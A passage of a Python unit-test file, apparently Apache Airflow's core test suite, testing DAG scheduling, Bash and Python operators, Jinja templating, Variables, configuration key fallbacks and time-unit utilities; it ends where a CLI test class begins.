# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import json
import unittest
import bleach
import doctest
import mock
import multiprocessing
import os
import re
import signal
import sqlalchemy
import subprocess
import tempfile
import warnings
from datetime import timedelta
from dateutil.relativedelta import relativedelta
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from numpy.testing import assert_array_almost_equal
from six.moves.urllib.parse import urlencode
from time import sleep
from airflow import configuration
from airflow.executors import SequentialExecutor
from airflow.models import Variable
from airflow import jobs, models, DAG, utils, macros, settings, exceptions
from airflow.models import BaseOperator
from airflow.models.connection import Connection
from airflow.operators.bash_operator import BashOperator
from airflow.operators.check_operator import CheckOperator, ValueCheckOperator
from airflow.operators.dagrun_operator import TriggerDagRunOperator
from airflow.operators.python_operator import PythonOperator
from airflow.operators.dummy_operator import DummyOperator
from airflow.hooks.base_hook import BaseHook
from airflow.hooks.sqlite_hook import SqliteHook
from airflow.bin import cli
from airflow.www import app as application
from airflow.settings import Session
from airflow.utils import timezone
from airflow.utils.timezone import datetime
from airflow.utils.state import State
from airflow.utils.dates import days_ago, infer_time_unit, round_time, scale_time_units
from lxml import html
from airflow.exceptions import AirflowException
from airflow.configuration import AirflowConfigException, run_command
from jinja2.sandbox import SecurityError
from jinja2 import UndefinedError
from pendulum import utcnow
import six
NUM_EXAMPLE_DAGS = 18
DEV_NULL = '/dev/null'
TEST_DAG_FOLDER = os.path.join(
os.path.dirname(os.path.realpath(__file__)), 'dags')
DEFAULT_DATE = datetime(2015, 1, 1)
DEFAULT_DATE_ISO = DEFAULT_DATE.isoformat()
DEFAULT_DATE_DS = DEFAULT_DATE_ISO[:10]
TEST_DAG_ID = 'unit_tests'
EXAMPLE_DAG_DEFAULT_DATE = days_ago(2)
try:
import cPickle as pickle
except ImportError:
# Python 3
import pickle
class OperatorSubclass(BaseOperator):
"""
An operator to test template substitution
"""
template_fields = ['some_templated_field']
def __init__(self, some_templated_field, *args, **kwargs):
super(OperatorSubclass, self).__init__(*args, **kwargs)
self.some_templated_field = some_templated_field
def execute(*args, **kwargs):
pass
class CoreTest(unittest.TestCase):
default_scheduler_args = {"num_runs": 1}
def setUp(self):
configuration.conf.load_test_config()
self.dagbag = models.DagBag(
dag_folder=DEV_NULL, include_examples=True)
self.args = {'owner': 'airflow', 'start_date': DEFAULT_DATE}
self.dag = DAG(TEST_DAG_ID, default_args=self.args)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
self.run_after_loop = self.dag_bash.get_task('run_after_loop')
self.run_this_last = self.dag_bash.get_task('run_this_last')
def tearDown(self):
if os.environ.get('KUBERNETES_VERSION') is None:
session = Session()
session.query(models.TaskInstance).filter_by(
dag_id=TEST_DAG_ID).delete()
session.query(models.TaskFail).filter_by(
dag_id=TEST_DAG_ID).delete()
session.commit()
session.close()
def test_schedule_dag_no_previous_runs(self):
"""
Tests scheduling a dag with no previous runs
"""
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_no_previous_runs')
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
datetime(2015, 1, 2, 0, 0),
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
dag.clear()
def test_schedule_dag_relativedelta(self):
"""
Tests scheduling a dag with a relativedelta schedule_interval
"""
delta = relativedelta(hours=+1)
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_relativedelta',
schedule_interval=delta)
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
datetime(2015, 1, 2, 0, 0),
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
dag_run2 = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run2)
self.assertEqual(dag.dag_id, dag_run2.dag_id)
self.assertIsNotNone(dag_run2.run_id)
self.assertNotEqual('', dag_run2.run_id)
self.assertEqual(
datetime(2015, 1, 2, 0, 0) + delta,
dag_run2.execution_date,
msg='dag_run2.execution_date did not match expectation: {0}'
.format(dag_run2.execution_date)
)
self.assertEqual(State.RUNNING, dag_run2.state)
self.assertFalse(dag_run2.external_trigger)
dag.clear()
def test_schedule_dag_fake_scheduled_previous(self):
"""
Test scheduling a dag where there is a prior DagRun
which has the same run_id as the next run should have
"""
delta = timedelta(hours=1)
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_fake_scheduled_previous',
schedule_interval=delta,
start_date=DEFAULT_DATE)
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=DEFAULT_DATE))
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
dag.create_dagrun(run_id=models.DagRun.id_for_date(DEFAULT_DATE),
execution_date=DEFAULT_DATE,
state=State.SUCCESS,
external_trigger=True)
dag_run = scheduler.create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
DEFAULT_DATE + delta,
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
def test_schedule_dag_once(self):
"""
Tests scheduling a dag scheduled for @once - should be scheduled the first time
it is called, and not scheduled the second.
"""
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_once')
dag.schedule_interval = '@once'
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
dag_run2 = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertIsNone(dag_run2)
dag.clear()
def test_fractional_seconds(self):
"""
Tests if fractional seconds are stored in the database
"""
dag = DAG(TEST_DAG_ID + 'test_fractional_seconds')
dag.schedule_interval = '@once'
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
start_date = timezone.utcnow()
run = dag.create_dagrun(
run_id='test_' + start_date.isoformat(),
execution_date=start_date,
start_date=start_date,
state=State.RUNNING,
external_trigger=False
)
run.refresh_from_db()
self.assertEqual(start_date, run.execution_date,
"dag run execution_date loses precision")
self.assertEqual(start_date, run.start_date,
"dag run start_date loses precision ")
def test_schedule_dag_start_end_dates(self):
"""
Tests that an attempt to schedule a task after the Dag's end_date
does not succeed.
"""
delta = timedelta(hours=1)
runs = 3
start_date = DEFAULT_DATE
end_date = start_date + (runs - 1) * delta
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_start_end_dates',
start_date=start_date,
end_date=end_date,
schedule_interval=delta)
dag.add_task(models.BaseOperator(task_id='faketastic',
owner='Also fake'))
# Create and schedule the dag runs
dag_runs = []
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
for i in range(runs):
dag_runs.append(scheduler.create_dag_run(dag))
additional_dag_run = scheduler.create_dag_run(dag)
for dag_run in dag_runs:
self.assertIsNotNone(dag_run)
self.assertIsNone(additional_dag_run)
def test_schedule_dag_no_end_date_up_to_today_only(self):
"""
Tests that a Dag created without an end_date can only be scheduled up
to and including the current datetime.
For example, if today is 2016-01-01 and we are scheduling from a
start_date of 2015-01-01, only jobs up to, but not including
2016-01-01 should be scheduled.
"""
session = settings.Session()
delta = timedelta(days=1)
now = utcnow()
start_date = now.subtract(weeks=1)
runs = (now - start_date).days
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_no_end_date_up_to_today_only',
start_date=start_date,
schedule_interval=delta)
dag.add_task(models.BaseOperator(task_id='faketastic',
owner='Also fake'))
dag_runs = []
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
for i in range(runs):
dag_run = scheduler.create_dag_run(dag)
dag_runs.append(dag_run)
# Mark the DagRun as complete
dag_run.state = State.SUCCESS
session.merge(dag_run)
session.commit()
# Attempt to schedule an additional dag run (for 2016-01-01)
additional_dag_run = scheduler.create_dag_run(dag)
for dag_run in dag_runs:
self.assertIsNotNone(dag_run)
self.assertIsNone(additional_dag_run)
def test_confirm_unittest_mod(self):
self.assertTrue(configuration.conf.get('core', 'unit_test_mode'))
def test_pickling(self):
dp = self.dag.pickle()
self.assertEqual(dp.pickle.dag_id, self.dag.dag_id)
def test_rich_comparison_ops(self):
class DAGsubclass(DAG):
pass
dag_eq = DAG(TEST_DAG_ID, default_args=self.args)
dag_diff_load_time = DAG(TEST_DAG_ID, default_args=self.args)
dag_diff_name = DAG(TEST_DAG_ID + '_neq', default_args=self.args)
dag_subclass = DAGsubclass(TEST_DAG_ID, default_args=self.args)
dag_subclass_diff_name = DAGsubclass(
TEST_DAG_ID + '2', default_args=self.args)
for d in [dag_eq, dag_diff_name, dag_subclass, dag_subclass_diff_name]:
d.last_loaded = self.dag.last_loaded
# test identity equality
self.assertEqual(self.dag, self.dag)
# test dag (in)equality based on _comps
self.assertEqual(dag_eq, self.dag)
self.assertNotEqual(dag_diff_name, self.dag)
self.assertNotEqual(dag_diff_load_time, self.dag)
# test dag inequality based on type even if _comps happen to match
self.assertNotEqual(dag_subclass, self.dag)
# a dag should equal an unpickled version of itself
d = pickle.dumps(self.dag)
self.assertEqual(pickle.loads(d), self.dag)
# dags are ordered based on dag_id no matter what the type is
self.assertLess(self.dag, dag_diff_name)
self.assertGreater(self.dag, dag_diff_load_time)
self.assertLess(self.dag, dag_subclass_diff_name)
# greater than should have been created automatically by functools
self.assertGreater(dag_diff_name, self.dag)
# hashes are non-random and match equality
self.assertEqual(hash(self.dag), hash(self.dag))
self.assertEqual(hash(dag_eq), hash(self.dag))
self.assertNotEqual(hash(dag_diff_name), hash(self.dag))
self.assertNotEqual(hash(dag_subclass), hash(self.dag))
def test_check_operators(self):
conn_id = "sqlite_default"
captainHook = BaseHook.get_hook(conn_id=conn_id)
captainHook.run("CREATE TABLE operator_test_table (a, b)")
captainHook.run("insert into operator_test_table values (1,2)")
t = CheckOperator(
task_id='check',
sql="select count(*) from operator_test_table",
conn_id=conn_id,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
t = ValueCheckOperator(
task_id='value_check',
pass_value=95,
tolerance=0.1,
conn_id=conn_id,
sql="SELECT 100",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
captainHook.run("drop table operator_test_table")
def test_clear_api(self):
task = self.dag_bash.tasks[0]
task.clear(
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE,
upstream=True, downstream=True)
ti = models.TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.are_dependents_done()
def test_illegal_args(self):
"""
Tests that Operators reject illegal arguments
"""
with warnings.catch_warnings(record=True) as w:
BashOperator(
task_id='test_illegal_args',
bash_command='echo success',
dag=self.dag,
illegal_argument_1234='hello?')
self.assertTrue(
issubclass(w[0].category, PendingDeprecationWarning))
self.assertIn(
('Invalid arguments were passed to BashOperator '
'(task_id: test_illegal_args).'),
w[0].message.args[0])
def test_bash_operator(self):
t = BashOperator(
task_id='test_bash_operator',
bash_command="echo success",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_multi_byte_output(self):
t = BashOperator(
task_id='test_multi_byte_bash_operator',
bash_command=u"echo \u2600",
dag=self.dag,
output_encoding='utf-8')
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_kill(self):
import psutil
sleep_time = "100%d" % os.getpid()
t = BashOperator(
task_id='test_bash_operator_kill',
execution_timeout=timedelta(seconds=1),
bash_command="/bin/bash -c 'sleep %s'" % sleep_time,
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
sleep(2)
pid = -1
for proc in psutil.process_iter():
if proc.cmdline() == ['sleep', sleep_time]:
pid = proc.pid
if pid != -1:
os.kill(pid, signal.SIGTERM)
self.fail("BashOperator's subprocess still running after stopping on timeout!")
def test_on_failure_callback(self):
# Annoying workaround for nonlocal not existing in python 2
data = {'called': False}
def check_failure(context, test_case=self):
data['called'] = True
error = context.get('exception')
test_case.assertIsInstance(error, AirflowException)
t = BashOperator(
task_id='check_on_failure_callback',
bash_command="exit 1",
dag=self.dag,
on_failure_callback=check_failure)
self.assertRaises(
exceptions.AirflowException,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
self.assertTrue(data['called'])
def test_trigger_dagrun(self):
def trigga(context, obj):
if True:
return obj
t = TriggerDagRunOperator(
task_id='test_trigger_dagrun',
trigger_dag_id='example_bash_operator',
python_callable=trigga,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_dryrun(self):
t = BashOperator(
task_id='test_dryrun',
bash_command="echo success",
dag=self.dag)
t.dry_run()
def test_sqlite(self):
import airflow.operators.sqlite_operator
t = airflow.operators.sqlite_operator.SqliteOperator(
task_id='time_sqlite',
sql="CREATE TABLE IF NOT EXISTS unitest (dummy VARCHAR(20))",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_timeout(self):
t = PythonOperator(
task_id='test_timeout',
execution_timeout=timedelta(seconds=1),
python_callable=lambda: sleep(5),
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_python_op(self):
def test_py_op(templates_dict, ds, **kwargs):
if not templates_dict['ds'] == ds:
raise Exception("failure")
t = PythonOperator(
task_id='test_py_op',
provide_context=True,
python_callable=test_py_op,
templates_dict={'ds': "{{ ds }}"},
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_complex_template(self):
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field['bar'][1],
context['ds'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field={
'foo': '123',
'bar': ['baz', '{{ ds }}']
},
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_variable(self):
"""
Test the availability of variables in templates
"""
val = {
'test_value': 'a test value'
}
Variable.set("a_variable", val['test_value'])
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
val['test_value'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.value.a_variable }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_json_variable(self):
"""
Test the availability of variables (serialized as JSON) in templates
"""
val = {
'test_value': {'foo': 'bar', 'obj': {'v1': 'yes', 'v2': 'no'}}
}
Variable.set("a_variable", val['test_value'], serialize_json=True)
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
val['test_value']['obj']['v2'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.json.a_variable.obj.v2 }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_json_variable_as_value(self):
"""
Test the availability of variables (serialized as JSON) in templates, but
accessed as a value
"""
val = {
'test_value': {'foo': 'bar'}
}
Variable.set("a_variable", val['test_value'], serialize_json=True)
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
u'{"foo": "bar"}')
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.value.a_variable }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_non_bool(self):
"""
Test templates can handle objects with no sense of truthiness
"""
class NonBoolObject(object):
def __len__(self):
return NotImplemented
def __bool__(self):
return NotImplemented
t = OperatorSubclass(
task_id='test_bad_template_obj',
some_templated_field=NonBoolObject(),
dag=self.dag)
t.resolve_template_files()
def test_task_get_template(self):
TI = models.TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
ti.dag = self.dag_bash
ti.run(ignore_ti_state=True)
context = ti.get_template_context()
# DEFAULT DATE is 2015-01-01
self.assertEquals(context['ds'], '2015-01-01')
self.assertEquals(context['ds_nodash'], '20150101')
# next_ds is 2015-01-02 as the dag interval is daily
self.assertEquals(context['next_ds'], '2015-01-02')
self.assertEquals(context['next_ds_nodash'], '20150102')
# prev_ds is 2014-12-31 as the dag interval is daily
self.assertEquals(context['prev_ds'], '2014-12-31')
self.assertEquals(context['prev_ds_nodash'], '20141231')
self.assertEquals(context['ts'], '2015-01-01T00:00:00+00:00')
self.assertEquals(context['ts_nodash'], '20150101T000000')
self.assertEquals(context['ts_nodash_with_tz'], '20150101T000000+0000')
self.assertEquals(context['yesterday_ds'], '2014-12-31')
self.assertEquals(context['yesterday_ds_nodash'], '20141231')
self.assertEquals(context['tomorrow_ds'], '2015-01-02')
self.assertEquals(context['tomorrow_ds_nodash'], '20150102')
def test_import_examples(self):
self.assertEqual(len(self.dagbag.dags), NUM_EXAMPLE_DAGS)
def test_local_task_job(self):
TI = models.TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
job = jobs.LocalTaskJob(task_instance=ti, ignore_ti_state=True)
job.run()
def test_raw_job(self):
TI = models.TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
ti.dag = self.dag_bash
ti.run(ignore_ti_state=True)
def test_doctests(self):
modules = [utils, macros]
for mod in modules:
failed, tests = doctest.testmod(mod)
if failed:
raise Exception("Failed a doctest")
def test_variable_set_get_round_trip(self):
Variable.set("tested_var_set_id", "Monday morning breakfast")
self.assertEqual("Monday morning breakfast", Variable.get("tested_var_set_id"))
def test_variable_set_get_round_trip_json(self):
value = {"a": 17, "b": 47}
Variable.set("tested_var_set_id", value, serialize_json=True)
self.assertEqual(value, Variable.get("tested_var_set_id", deserialize_json=True))
def test_get_non_existing_var_should_return_default(self):
default_value = "some default val"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value))
def test_get_non_existing_var_should_not_deserialize_json_default(self):
default_value = "}{ this is a non JSON default }{"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value,
deserialize_json=True))
def test_variable_setdefault_round_trip(self):
key = "tested_var_setdefault_1_id"
value = "Monday morning breakfast in Paris"
Variable.setdefault(key, value)
self.assertEqual(value, Variable.get(key))
def test_variable_setdefault_round_trip_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Hapiness": True}
Variable.setdefault(key, value, deserialize_json=True)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
def test_variable_setdefault_existing_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Hapiness": True}
Variable.set(key, value, serialize_json=True)
val = Variable.setdefault(key, value, deserialize_json=True)
# Check the returned value, and the stored value are handled correctly.
self.assertEqual(value, val)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
def test_parameterized_config_gen(self):
cfg = configuration.parameterized_config(configuration.DEFAULT_CONFIG)
# making sure some basic building blocks are present:
self.assertIn("[core]", cfg)
self.assertIn("dags_folder", cfg)
self.assertIn("sql_alchemy_conn", cfg)
self.assertIn("fernet_key", cfg)
# making sure replacement actually happened
self.assertNotIn("{AIRFLOW_HOME}", cfg)
self.assertNotIn("{FERNET_KEY}", cfg)
def test_config_use_original_when_original_and_fallback_are_present(self):
self.assertTrue(configuration.conf.has_option("core", "FERNET_KEY"))
self.assertFalse(configuration.conf.has_option("core", "FERNET_KEY_CMD"))
FERNET_KEY = configuration.conf.get('core', 'FERNET_KEY')
configuration.conf.set("core", "FERNET_KEY_CMD", "printf HELLO")
FALLBACK_FERNET_KEY = configuration.conf.get(
"core",
"FERNET_KEY"
)
self.assertEqual(FERNET_KEY, FALLBACK_FERNET_KEY)
# restore the conf back to the original state
configuration.conf.remove_option("core", "FERNET_KEY_CMD")
def test_config_throw_error_when_original_and_fallback_is_absent(self):
self.assertTrue(configuration.conf.has_option("core", "FERNET_KEY"))
self.assertFalse(configuration.conf.has_option("core", "FERNET_KEY_CMD"))
FERNET_KEY = configuration.conf.get("core", "FERNET_KEY")
configuration.conf.remove_option("core", "FERNET_KEY")
with self.assertRaises(AirflowConfigException) as cm:
configuration.conf.get("core", "FERNET_KEY")
exception = str(cm.exception)
message = "section/key [core/fernet_key] not found in config"
self.assertEqual(message, exception)
# restore the conf back to the original state
configuration.conf.set("core", "FERNET_KEY", FERNET_KEY)
self.assertTrue(configuration.conf.has_option("core", "FERNET_KEY"))
def test_config_override_original_when_non_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = "some value"
self.assertNotIn(key, os.environ)
os.environ[key] = value
FERNET_KEY = configuration.conf.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
# restore the envvar back to the original state
del os.environ[key]
def test_config_override_original_when_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = ""
self.assertNotIn(key, os.environ)
os.environ[key] = value
FERNET_KEY = configuration.conf.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
# restore the envvar back to the original state
del os.environ[key]
def test_round_time(self):
rt1 = round_time(datetime(2015, 1, 1, 6), timedelta(days=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt1)
rt2 = round_time(datetime(2015, 1, 2), relativedelta(months=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt2)
rt3 = round_time(datetime(2015, 9, 16, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 16, 0, 0), rt3)
rt4 = round_time(datetime(2015, 9, 15, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 15, 0, 0), rt4)
rt5 = round_time(datetime(2015, 9, 14, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt5)
rt6 = round_time(datetime(2015, 9, 13, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt6)
def test_infer_time_unit(self):
self.assertEqual('minutes', infer_time_unit([130, 5400, 10]))
self.assertEqual('seconds', infer_time_unit([110, 50, 10, 100]))
self.assertEqual('hours', infer_time_unit([100000, 50000, 10000, 20000]))
self.assertEqual('days', infer_time_unit([200000, 100000]))
def test_scale_time_units(self):
# use assert_almost_equal from numpy.testing since we are comparing
# floating point arrays
arr1 = scale_time_units([130, 5400, 10], 'minutes')
assert_array_almost_equal(arr1, [2.167, 90.0, 0.167], decimal=3)
arr2 = scale_time_units([110, 50, 10, 100], 'seconds')
assert_array_almost_equal(arr2, [110.0, 50.0, 10.0, 100.0], decimal=3)
arr3 = scale_time_units([100000, 50000, 10000, 20000], 'hours')
assert_array_almost_equal(arr3, [27.778, 13.889, 2.778, 5.556],
decimal=3)
arr4 = scale_time_units([200000, 100000], 'days')
assert_array_almost_equal(arr4, [2.315, 1.157], decimal=3)
def test_duplicate_dependencies(self):
regexp = "Dependency (.*)runme_0(.*)run_after_loop(.*) " \
"already registered"
with self.assertRaisesRegexp(AirflowException, regexp):
self.runme_0.set_downstream(self.run_after_loop)
with self.assertRaisesRegexp(AirflowException, regexp):
self.run_after_loop.set_upstream(self.runme_0)
def test_bad_trigger_rule(self):
with self.assertRaises(AirflowException):
DummyOperator(
task_id='test_bad_trigger',
trigger_rule="non_existent",
dag=self.dag)
def test_terminate_task(self):
"""If a task instance's db state get deleted, it should fail"""
TI = models.TaskInstance
dag = self.dagbag.dags.get('test_utils')
task = dag.task_dict.get('sleeps_forever')
ti = TI(task=task, execution_date=DEFAULT_DATE)
job = jobs.LocalTaskJob(
task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
# Running task instance asynchronously
p = multiprocessing.Process(target=job.run)
p.start()
sleep(5)
settings.engine.dispose()
session = settings.Session()
ti.refresh_from_db(session=session)
# making sure it's actually running
self.assertEqual(State.RUNNING, ti.state)
ti = session.query(TI).filter_by(
dag_id=task.dag_id,
task_id=task.task_id,
execution_date=DEFAULT_DATE
).one()
# deleting the instance should result in a failure
session.delete(ti)
session.commit()
# waiting for the async task to finish
p.join()
# making sure that the task ended up as failed
ti.refresh_from_db(session=session)
self.assertEqual(State.FAILED, ti.state)
session.close()
def test_task_fail_duration(self):
"""If a task fails, the duration should be recorded in TaskFail"""
p = BashOperator(
task_id='pass_sleepy',
bash_command='sleep 3',
dag=self.dag)
f = BashOperator(
task_id='fail_sleepy',
bash_command='sleep 5',
execution_timeout=timedelta(seconds=3),
retry_delay=timedelta(seconds=0),
dag=self.dag)
session = settings.Session()
try:
p.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except Exception:
pass
try:
f.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except Exception:
pass
p_fails = session.query(models.TaskFail).filter_by(
task_id='pass_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
f_fails = session.query(models.TaskFail).filter_by(
task_id='fail_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
self.assertEqual(0, len(p_fails))
self.assertEqual(1, len(f_fails))
self.assertGreaterEqual(sum([f.duration for f in f_fails]), 3)
def test_dag_stats(self):
"""Correctly sets/dirties/cleans rows of DagStat table"""
session = settings.Session()
session.query(models.DagRun).delete()
session.query(models.DagStat).delete()
session.commit()
models.DagStat.update([], session=session)
self.dag_bash.create_dagrun(
run_id="run1",
execution_date=DEFAULT_DATE,
state=State.RUNNING)
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).all()
self.assertEqual(3, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
for stats in qry:
if stats.state == State.RUNNING:
self.assertEqual(stats.count, 1)
else:
self.assertEqual(stats.count, 0)
self.assertFalse(stats.dirty)
self.dag_bash.create_dagrun(
run_id="run2",
execution_date=DEFAULT_DATE + timedelta(days=1),
state=State.RUNNING)
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).all()
self.assertEqual(3, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
for stats in qry:
if stats.state == State.RUNNING:
self.assertEqual(stats.count, 2)
else:
self.assertEqual(stats.count, 0)
self.assertFalse(stats.dirty)
session.query(models.DagRun).first().state = State.SUCCESS
session.commit()
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).filter(models.DagStat.state == State.SUCCESS).all()
self.assertEqual(1, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
self.assertEqual(State.SUCCESS, qry[0].state)
self.assertEqual(1, qry[0].count)
self.assertFalse(qry[0].dirty)
qry = session.query(models.DagStat).filter(models.DagStat.state == State.RUNNING).all()
self.assertEqual(1, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
self.assertEqual(State.RUNNING, qry[0].state)
self.assertEqual(1, qry[0].count)
self.assertFalse(qry[0].dirty)
session.query(models.DagRun).delete()
session.query(models.DagStat).delete()
session.commit()
session.close()
def test_run_command(self):
if six.PY3:
write = r'sys.stdout.buffer.write("\u1000foo".encode("utf8"))'
else:
write = r'sys.stdout.write(u"\u1000foo".encode("utf8"))'
cmd = 'import sys; {0}; sys.stdout.flush()'.format(write)
self.assertEqual(run_command("python -c '{0}'".format(cmd)),
u'\u1000foo' if six.PY3 else 'foo')
self.assertEqual(run_command('echo "foo bar"'), u'foo bar\n')
self.assertRaises(AirflowConfigException, run_command, 'bash -c "exit 1"')
def test_trigger_dagrun_with_execution_date(self):
utc_now = timezone.utcnow()
run_id = 'trig__' + utc_now.isoformat()
def payload_generator(context, object):
object.run_id = run_id
return object
task = TriggerDagRunOperator(task_id='test_trigger_dagrun_with_execution_date',
trigger_dag_id='example_bash_operator',
python_callable=payload_generator,
execution_date=utc_now,
dag=self.dag)
task.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
dag_runs = models.DagRun.find(dag_id='example_bash_operator',
run_id=run_id)
self.assertEquals(len(dag_runs), 1)
dag_run = dag_runs[0]
self.assertEquals(dag_run.execution_date, utc_now)
class CliTests(unittest.TestCase):
@classmethod
def setUpClass(cls):
